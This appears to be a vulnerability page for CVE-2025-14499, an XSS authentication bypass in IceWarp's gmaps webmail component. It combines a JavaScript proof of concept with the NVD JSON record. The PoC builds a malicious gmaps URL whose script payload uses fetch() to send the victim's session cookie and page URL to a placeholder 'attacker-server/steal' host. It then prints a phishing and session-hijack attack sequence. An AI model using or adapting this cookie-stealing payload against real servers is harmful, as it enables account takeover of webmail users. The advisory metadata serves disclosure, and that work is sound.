CVE-2025-14499

// CVE-2025-14499 PoC - IceWarp gmaps XSS Authentication Bypass // This PoC demonstrates the XSS vulnerability in IceWarp gmaps component const targetUrl = 'https://target-icewarp-server'; // Malicious XSS payload to steal session cookies const xssPayload = '<script>\n' + 'fetch("https://attacker-server/steal?cookie=" + document.cookie + "&url=" + location.href)\n' + '</script>'; // Encode the payload for URL injection const encodedPayload = encodeURIComponent(xssPayload); // Construct the malicious URL targeting gmaps endpoint const maliciousUrl = `${targetUrl}/webmail/gmaps?param=${encodedPayload}`; // Display the exploit URL console.log('Malicious URL:', maliciousUrl); // Simulate the attack scenario function simulateAttack() { console.log('\n[+] Attack Simulation:'); console.log('1. Attacker crafts malicious URL with XSS payload'); console.log('2. Attacker sends URL to victim via phishing email'); console.log('3. Victim clicks the link while logged into IceWarp'); console.log('4. XSS payload executes in victim\'s browser'); console.log('5. Session cookies are stolen and sent to attacker'); console.log('6. Attacker hijacks the session and bypasses authentication'); } simulateAttack();

{"cve": {"id": "CVE-2025-14499", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:51.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IceWarp gmaps Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of IceWarp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of a parameter passed to the gmaps webpage. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-25441."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://support.icewarp.com/hc/en-us/community/posts/40040542307729-EPOS-Update-2-build-8-14-2-0-8", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1071/", "source": "[email protected]"}]}}